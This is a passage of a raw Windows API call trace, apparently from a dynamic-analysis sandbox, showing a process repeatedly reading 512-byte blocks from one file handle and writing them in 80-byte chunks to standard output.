lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.095] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.095] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.096] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.096] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.097] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.097] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.098] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.098] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.099] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.099] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.100] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.101] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.102] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.102] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, 